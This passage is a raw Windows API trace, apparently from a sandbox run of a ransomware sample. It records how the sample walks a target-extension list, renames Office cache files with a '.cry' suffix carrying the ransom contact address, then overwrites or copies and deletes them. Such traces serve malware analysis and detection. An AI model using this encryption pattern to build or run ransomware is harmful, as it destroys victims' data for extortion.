[0050.123] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0050.123] lstrlenW (lpString=".jpg") returned 4 [0050.123] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.123] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0050.123] lstrlenW (lpString="osetup.dll") returned 10 [0050.123] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0050.320] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=7378792) returned 1 [0050.320] CloseHandle (hObject=0x20c) returned 1 [0050.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0050.320] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.323] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0050.324] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0050.324] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.324] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.324] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.444] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.444] ReadFile (in: hFile=0x21c, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.456] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.456] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.456] ReadFile (in: hFile=0x21c, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.509] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.509] WriteFile (in: hFile=0x21c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0050.523] SetEndOfFile (hFile=0x21c) returned 1 [0050.523] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x43b0048 [0050.527] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.527] WriteFile (in: hFile=0x21c, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.528] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.528] WriteFile (in: hFile=0x21c, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.530] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.530] WriteFile (in: hFile=0x21c, lpBuffer=0x43b0048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x43b0048*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.531] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x43b0048 | out: hHeap=0x600000) returned 1 [0050.531] CloseHandle (hObject=0x21c) returned 1 [0050.531] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.531] lstrlenW (lpString=".doc") returned 4 [0050.531] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.531] lstrlenW (lpString=".docx") returned 5 [0050.531] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0050.531] lstrlenW (lpString=".pdf") returned 4 [0050.531] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.531] lstrlenW (lpString=".xls") returned 4 [0050.531] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString=".xlsx") returned 5 [0050.532] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0050.532] lstrlenW (lpString=".ppt") returned 4 [0050.532] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.532] lstrlenW (lpString=".zip") returned 4 [0050.532] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString=".rar") returned 4 [0050.532] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString=".bz2") returned 4 [0050.532] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.532] lstrlenW (lpString=".7z") returned 3 [0050.532] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.532] lstrlenW (lpString=".dbf") returned 4 [0050.532] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.532] lstrlenW (lpString=".1cd") returned 4 [0050.532] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.532] lstrlenW (lpString=".jpg") returned 4 [0050.532] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.532] lstrlenW (lpString=".doc") returned 4 [0050.532] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString=".docx") returned 5 [0050.532] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0050.532] lstrlenW (lpString=".pdf") returned 4 [0050.532] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString=".xls") returned 4 [0050.532] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString=".xlsx") returned 5 [0050.532] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0050.532] lstrlenW (lpString=".ppt") returned 4 [0050.532] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0050.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.532] lstrlenW (lpString=".zip") returned 4 [0050.532] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0050.533] lstrlenW (lpString=".rar") returned 4 [0050.533] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0050.533] lstrlenW (lpString=".bz2") returned 4 [0050.533] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0050.533] lstrlenW (lpString=".7z") returned 3 [0050.533] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0050.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.533] lstrlenW (lpString=".dbf") returned 4 [0050.533] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0050.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.533] lstrlenW (lpString=".1cd") returned 4 [0050.533] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0050.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0050.533] lstrlenW (lpString=".jpg") returned 4 [0050.533] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.533] lstrcmpiW (lpString1=".xrm-ms", lpString2=".cry") returned 1 [0050.533] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0050.533] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0050.533] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=715834) returned 1 [0050.533] CloseHandle (hObject=0x21c) returned 1 [0050.533] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0050.533] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.534] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0050.534] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.534] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.534] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0050.534] GetLastError () returned 0x0 [0050.534] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0050.572] WriteFile (in: hFile=0x1f4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0050.585] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.585] WriteFile (in: hFile=0x1f4, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0x104, lpOverlapped=0x0) returned 1 [0050.586] SetEndOfFile (hFile=0x1f4) returned 1 [0050.586] CloseHandle (hObject=0x1f4) returned 1 [0050.586] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.586] SetEndOfFile (hFile=0x21c) returned 1 [0050.591] CloseHandle (hObject=0x21c) returned 1 [0050.591] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.591] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0050.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.689] lstrlenW (lpString=".doc") returned 4 [0050.689] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString=".docx") returned 5 [0050.689] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0050.689] lstrlenW (lpString=".pdf") returned 4 [0050.689] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString=".xls") returned 4 [0050.689] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString=".xlsx") returned 5 [0050.689] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0050.689] lstrlenW (lpString=".ppt") returned 4 [0050.689] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.689] lstrlenW (lpString=".zip") returned 4 [0050.689] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString=".rar") returned 4 [0050.689] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString=".bz2") returned 4 [0050.689] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString=".7z") returned 3 [0050.689] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0050.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.689] lstrlenW (lpString=".dbf") returned 4 [0050.689] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.689] lstrlenW (lpString=".1cd") returned 4 [0050.689] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0050.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.689] lstrlenW (lpString=".jpg") returned 4 [0050.689] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.690] lstrlenW (lpString=".doc") returned 4 [0050.690] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString=".docx") returned 5 [0050.690] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0050.690] lstrlenW (lpString=".pdf") returned 4 [0050.690] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString=".xls") returned 4 [0050.690] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString=".xlsx") returned 5 [0050.690] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0050.690] lstrlenW (lpString=".ppt") returned 4 [0050.690] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.690] lstrlenW (lpString=".zip") returned 4 [0050.690] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString=".rar") returned 4 [0050.690] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString=".bz2") returned 4 [0050.690] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString=".7z") returned 3 [0050.690] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0050.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.690] lstrlenW (lpString=".dbf") returned 4 [0050.690] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.690] lstrlenW (lpString=".1cd") returned 4 [0050.690] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0050.690] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0050.690] lstrlenW (lpString=".jpg") returned 4 [0050.690] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0050.690] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0050.690] lstrlenW (lpString="VisiorWW.msi") returned 12 [0050.691] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0050.725] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=12060672) returned 1 [0050.725] CloseHandle (hObject=0x21c) returned 1 [0050.725] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 0x2020 [0050.725] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.725] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0050.725] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0050.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.726] ReadFile (in: hFile=0x21c, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.831] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.832] ReadFile (in: hFile=0x21c, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.875] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.875] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.875] ReadFile (in: hFile=0x21c, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.999] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.999] WriteFile (in: hFile=0x21c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0051.025] SetEndOfFile (hFile=0x21c) returned 1 [0051.026] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0051.068] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.068] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.070] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.070] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.074] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.074] WriteFile (in: hFile=0x21c, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.076] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0051.076] CloseHandle (hObject=0x21c) returned 1 [0051.076] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0051.077] lstrlenW (lpString="C:\\MSOCache\\All 